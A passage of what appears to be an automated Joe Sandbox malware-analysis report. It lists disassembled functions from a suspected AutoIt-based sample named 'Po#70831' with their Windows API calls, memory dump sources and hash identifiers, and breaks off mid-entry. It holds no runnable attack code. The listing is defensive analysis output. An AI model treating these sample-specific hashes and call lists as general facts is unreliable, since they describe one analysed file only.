                                      Function 00524653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00524705
                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00524713
                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0052471A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 4014797782-2298589950
                                      • Opcode ID: 0e627c27e58bb94c40d074e3c8d34a98e6d7d5d51ef3a3b475a90c44c41d5981
                                      • Instruction ID: 11b2cbf3565e1dd7c61f1c0a43343d783b3e2b21afdb867a49124c5ef2738a04
                                      • Opcode Fuzzy Hash: 0e627c27e58bb94c40d074e3c8d34a98e6d7d5d51ef3a3b475a90c44c41d5981
                                      • Instruction Fuzzy Hash: 46214FB5600219AFDB11DF68ECD1DB63BADEF5A358B040059FA159B291C770EC12DA60
                                      Function 004F95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 176396367-2734436370
                                      • Opcode ID: 88a654d172f6e5e5132ab09512ff644d53dc062787a0247083da721189ece032
                                      • Instruction ID: 734aa2528f8853235aa801213e8ed9b94fe927de65def7326e6d1c11c1e7dd19
                                      • Opcode Fuzzy Hash: 88a654d172f6e5e5132ab09512ff644d53dc062787a0247083da721189ece032
                                      • Instruction Fuzzy Hash: BE21267210412566D731AA35A802FB777D8AFA1314F14403FFA49D7281EB5DAD46C3AD
                                      Function 005237B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00523840
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00523850
                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00523876
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 0b45ca62bc54d87e559506d8c8496c23b9c3df44be556c05c0a83d64ed0560b4
                                      • Instruction ID: 7f66473a089d66b68e5ddbbe71e0b18cf46378287c6370b9764f3555069479de
                                      • Opcode Fuzzy Hash: 0b45ca62bc54d87e559506d8c8496c23b9c3df44be556c05c0a83d64ed0560b4
                                      • Instruction Fuzzy Hash: 3F21B072600228BBEF218F54EC85EBB3B6EFF8A754F118124F9009B1D0C675DD5287A0
                                      Function 005049F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00504A08
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00504A5C
                                      • SetErrorMode.KERNEL32(00000000,?,?,0052CC08), ref: 00504AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume
                                      • String ID: %lu
                                      • API String ID: 2507767853-685833217
                                      • Opcode ID: fcc473011462a0b5b52141d4d46ccd6c8a73d80f687128b466edc9346bf7e425
                                      • Instruction ID: 257ee73cb4475fbd09b843b02328dccc0421842ff828ece05edf8a54e8bb348b
                                      • Opcode Fuzzy Hash: fcc473011462a0b5b52141d4d46ccd6c8a73d80f687128b466edc9346bf7e425
                                      • Instruction Fuzzy Hash: 14315075A00109AFDB10DF54C885EAE7BF9EF05308F1480A9E905DB252D775ED45CB61
                                      Function 005241EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0052424F
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00524264
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00524271
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: af9c21bb84453a8de057f358e6c35e6ea43d5ff17404579db46c78022e3a6191
                                      • Instruction ID: ba8035c12ccbb3045b3bad9dc3de563c357bded6813882573f600bd48aaefa46
                                      • Opcode Fuzzy Hash: af9c21bb84453a8de057f358e6c35e6ea43d5ff17404579db46c78022e3a6191
                                      • Instruction Fuzzy Hash: E111C131240218BEEF205E69DC46FAB3FACFF96B54F010524FA55E60D0D2B1D8219B20
                                      Function 004F2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                        • Part of subcall function 004F2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004F2DC5
                                        • Part of subcall function 004F2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F2DD6
                                        • Part of subcall function 004F2DA7: GetCurrentThreadId.KERNEL32 ref: 004F2DDD
                                        • Part of subcall function 004F2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004F2DE4
                                      • GetFocus.USER32 ref: 004F2F78
                                        • Part of subcall function 004F2DEE: GetParent.USER32(00000000), ref: 004F2DF9
                                      • GetClassNameW.USER32(?,?,00000100), ref: 004F2FC3
                                      • EnumChildWindows.USER32(?,004F303B), ref: 004F2FEB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                      • String ID: %s%d
                                      • API String ID: 1272988791-1110647743
                                      • Opcode ID: 082d693d5e3a9f3ade1deea45d415753281250ac8b23a54b58bc24e82a64ae2a
                                      • Instruction ID: 57a9cc9fe2b722df937d874fed0aaf28916532d64f74596919cfb638f421ce5d
                                      • Opcode Fuzzy Hash: 082d693d5e3a9f3ade1deea45d415753281250ac8b23a54b58bc24e82a64ae2a
                                      • Instruction Fuzzy Hash: B611D8716002096BCF10BF658C85EFD3B6AAF94309F04407BBA099B153DE7499098B65
                                      Function 00525882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005258C1
                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005258EE
                                      • DrawMenuBar.USER32(?), ref: 005258FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Menu$InfoItem$Draw
                                      • String ID: 0
                                      • API String ID: 3227129158-4108050209
                                      • Opcode ID: f406a89b69f3244e062cef4d3924fd6d0cdbe4ff8c31c36908a801dff4e929cc
                                      • Instruction ID: b32eb83a4e2eceff71fda0fb7731a4c1d74dd8e4e68830a64f37bd6ed473060c
                                      • Opcode Fuzzy Hash: f406a89b69f3244e062cef4d3924fd6d0cdbe4ff8c31c36908a801dff4e929cc
                                      • Instruction Fuzzy Hash: 6F015E31500218EEDB219F51EC44BAFBFB4FF56360F108099F849D6191EB308A88EF61
                                      Function 004ED3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 004ED3BF
                                      • FreeLibrary.KERNEL32 ref: 004ED3E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProc
                                      • String ID: GetSystemWow64DirectoryW$X64
                                      • API String ID: 3013587201-2590602151
                                      • Opcode ID: 2f1536dd0771f34047e8a10dfd1c9508d10a04bb52dbe373af0bdcf9082ed1b7
                                      • Instruction ID: 52885573adbc69d3530176750d209bcf0437046e439412a7d258a25cb7bd1c2b
                                      • Opcode Fuzzy Hash: 2f1536dd0771f34047e8a10dfd1c9508d10a04bb52dbe373af0bdcf9082ed1b7
                                      • Instruction Fuzzy Hash: DFF05521D05A609BC73102125C949AF3B24BF22B03B58859BF902E624AD72CCC4AC2AF
                                      Function 004F007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8aaf0b517ce95be0d3c9e1fef2bdbdbe6e9da4de9de99ad532528efe194fdf6
                                      • Instruction ID: 92593afd9f41bf8f481ac748ccf9648b5e40698f50c2f1645e1ef0ca2074fde9
                                      • Opcode Fuzzy Hash: d8aaf0b517ce95be0d3c9e1fef2bdbdbe6e9da4de9de99ad532528efe194fdf6
                                      • Instruction Fuzzy Hash: 72C16C75A0020AEFCB14CF94C894ABEB7B5FF88304F118599EA05EB252D735ED42CB94
                                      Function 0051342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInitInitializeUninitialize
                                      • String ID:
                                      • API String ID: 1998397398-0
                                      • Opcode ID: 7d84bb968b1d0e645c754f268d953f5ac10f7e415b107b00475ceb369288b9f8
                                      • Instruction ID: adac9d3d4b149b8345d783821711062f24b94028e6d938a2b168ad16ad5c7e0b
                                      • Opcode Fuzzy Hash: 7d84bb968b1d0e645c754f268d953f5ac10f7e415b107b00475ceb369288b9f8
                                      • Instruction Fuzzy Hash: 59A1AE752042009FDB00DF25C495A6ABBE5FF88728F05885EF84A9B362DB34ED45CB95
                                      Function 004F0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                      Download Yara Rule
                                      APIs
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0052FC08,?), ref: 004F05F0
                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0052FC08,?), ref: 004F0608
                                      • CLSIDFromProgID.OLE32(?,?,00000000,0052CC40,000000FF,?,00000000,00000800,00000000,?,0052FC08,?), ref: 004F062D
                                      • _memcmp.LIBVCRUNTIME ref: 004F064E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FromProg$FreeTask_memcmp
                                      • String ID:
                                      • API String ID: 314563124-0
                                      • Opcode ID: 47f9b3ad6ffae07c40695145a65ea04c82c4037983d2d034a941f5dd181b74a5
                                      • Instruction ID: 1ac16b1c1b1b7b5c06e98b68ab6fd9212f5f8be9c143a31a6f5b096d0263b3aa
                                      • Opcode Fuzzy Hash: 47f9b3ad6ffae07c40695145a65ea04c82c4037983d2d034a941f5dd181b74a5
                                      • Instruction Fuzzy Hash: C8813971A00109EFCB04DF94C984EEEB7B9FF89315F204199E606EB251DB75AE06CB64
                                      Function 004D1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 73d948a90356a7a7e15fa2f58a589da374e17100107a9d81a10f56dca2854b43
                                      • Instruction ID: ddc15f1d68f14804e9b417b3dfbb6ade3bba551e61fb49302718c87d2d3b9997
                                      • Opcode Fuzzy Hash: 73d948a90356a7a7e15fa2f58a589da374e17100107a9d81a10f56dca2854b43
                                      • Instruction Fuzzy Hash: 7B414E756005007BDB256BBA9C56ABF3AA4EF41378F14026FFC18D23B1E67D4841527E
                                      Function 00526278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(0118EE50,?), ref: 005262E2
                                      • ScreenToClient.USER32(?,?), ref: 00526315
                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00526382
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: 73cdd67820c1df9ab6d749fcfaca55e9cdd95135c8f481f1b029b29844fb7cd2
                                      • Instruction ID: 7c57eda5b41d1d3d7d81db5868f6e96815588cf286e8942aa0bbf64147b579d1
                                      • Opcode Fuzzy Hash: 73cdd67820c1df9ab6d749fcfaca55e9cdd95135c8f481f1b029b29844fb7cd2
                                      • Instruction Fuzzy Hash: 16512A74A00219EFDF20DF68E880AAE7BB5FF66360F148569F9159B290D730ED41DB90
                                      Function 00511AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00511AFD
                                      • WSAGetLastError.WSOCK32 ref: 00511B0B
                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00511B8A
                                      • WSAGetLastError.WSOCK32 ref: 00511B94
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLast$socket
                                      • String ID:
                                      • API String ID: 1881357543-0
                                      • Opcode ID: af3a6953d5cbc9aceeec74022b88a3e143352f0e079c433e0307041c1806ccd3
                                      • Instruction ID: 96e4658c6edb42c36b7f8ef253879e2a6d9cc5bb60b3c3c112e97e7ae9b53156
                                      • Opcode Fuzzy Hash: af3a6953d5cbc9aceeec74022b88a3e143352f0e079c433e0307041c1806ccd3
                                      • Instruction Fuzzy Hash: 6A41F4346006006FEB20AF21C886F697BE5AF45718F54849DFA1A8F3D3D776ED818B94
                                      Function 004CB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
